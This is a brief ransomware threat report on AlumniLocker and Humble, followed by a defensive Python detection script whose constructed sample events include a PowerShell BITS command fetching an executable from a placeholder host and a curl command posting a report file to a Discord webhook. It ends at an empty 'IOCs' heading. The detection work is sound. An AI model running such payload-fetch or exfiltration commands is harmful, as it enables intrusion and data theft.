New Ransomware AlumniLocker and Humble

Researchers recently discovered two new ransomware variants, AlumniLocker and Humble. AlumniLocker is a variant of the Thanos ransomware family and spreads through PDF files disguised as invoices.

The PDF contains a malicious download link. Once clicked, it fetches a ZIP file containing the malicious downloader. The ZIP file holds a PowerShell script disguised as a JPG file, which uses the Background Intelligent Transfer Service (BITS) module to download and execute the AlumniLocker payload. The AlumniLocker payload is a Microsoft Intermediate Language (MSIL) executable packed with Themida. Once AlumniLocker has encrypted the victim’s files, it displays the ransom note in Notepad, demanding a ransom of 10 bitcoins.

Humble ransomware was compiled with Bat2Exe, and researchers found two variants that arrive in different forms. One variant threatens that the master boot record (MBR) will be rewritten if the victim restarts the system; the other threatens that the MBR will be rewritten if the ransom is not paid within five days.

Humble uses the webhook service of the Discord communication platform to report to its operators or publish the victim’s infection report; prevents explorer.exe from viewing or accessing local storage drives; uses extd.exe for file encryption; uses certutil.exe to manage certificates; generates keys from random input; and encrypts 104 file types. It also displays a ransom note set as the user’s lock-screen image, warning the victim not to restart the system.
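As an added illustration that is not part of the original report, the following Python sketch turns the behaviours described for both families above (PowerShell script posing as an image, BITS download from PowerShell, certutil.exe driven from a batch wrapper, Discord webhook reporting) into detection rules and runs them over constructed process-creation events. The .jpg.ps1 naming, the cmd.exe parent for the Bat2Exe wrapper, and every path and URL are assumptions for illustration, not values from the report.

```python
from __future__ import annotations
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:
    """One process-creation record (constructed, Sysmon Event ID 1 style)."""
    parent: str   # parent image path
    image: str    # created process image path
    cmdline: str  # full command line

# Patterns derived from the behaviour described above. The .jpg.ps1 naming and the
# webhook hosts are assumptions for illustration, not values from the report.
DISGUISED_PS1 = re.compile(r"\.(jpe?g|png|pdf)\.ps1\b", re.I)
BITS_TRANSFER = re.compile(r"Start-BitsTransfer|bitsadmin(\.exe)?\s+/transfer", re.I)
DISCORD_WEBHOOK = re.compile(r"https?://(www\.)?discord(app)?\.com/api/webhooks/", re.I)

def classify(ev: ProcEvent) -> list[str]:
    """Return the names of every rule this event matches (empty list if none)."""
    img = ev.image.lower().rsplit("\\", 1)[-1]
    parent = ev.parent.lower().rsplit("\\", 1)[-1]
    hits: list[str] = []
    if img == "powershell.exe" and DISGUISED_PS1.search(ev.cmdline):
        hits.append("powershell_script_disguised_as_image")   # AlumniLocker dropper
    if "powershell.exe" in (img, parent) and BITS_TRANSFER.search(ev.cmdline):
        hits.append("bits_transfer_from_powershell")          # AlumniLocker payload fetch
    if img == "certutil.exe" and parent == "cmd.exe":
        hits.append("certutil_from_cmd")  # Humble; assumes the Bat2Exe wrapper runs its batch via cmd.exe
    if DISCORD_WEBHOOK.search(ev.cmdline):
        hits.append("discord_webhook_report")                 # Humble infection report
    return hits

def scan(events: list[ProcEvent]) -> dict[int, list[str]]:
    """Map event index -> matched rules, keeping only events that matched something."""
    results: dict[int, list[str]] = {}
    for i, ev in enumerate(events):
        if hits := classify(ev):
            results[i] = hits
    return results

# Constructed sample telemetry; paths and URLs are placeholders, not real IOCs.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CMD = r"C:\Windows\System32\cmd.exe"
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe", PS, r"powershell.exe -File C:\Users\u\Downloads\invoice.jpg.ps1"),
    ProcEvent(PS, PS, r"powershell -c Start-BitsTransfer -Source http://example.invalid/p.bin -Destination C:\Users\Public\p.exe"),
    ProcEvent(CMD, r"C:\Windows\System32\certutil.exe", "certutil -store My"),
    ProcEvent(CMD, r"C:\Windows\System32\curl.exe", "curl -X POST https://discord.com/api/webhooks/0/placeholder -d @report.txt"),
    ProcEvent(r"C:\Windows\explorer.exe", PS, r"powershell.exe -File C:\Scripts\backup.ps1"),  # benign control
]
```

Running `scan(SAMPLE_EVENTS)` flags the first four constructed events with one rule each and leaves the benign PowerShell run untouched; in production the rules would be fed from EDR or Sysmon telemetry rather than the inline list.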

IOCs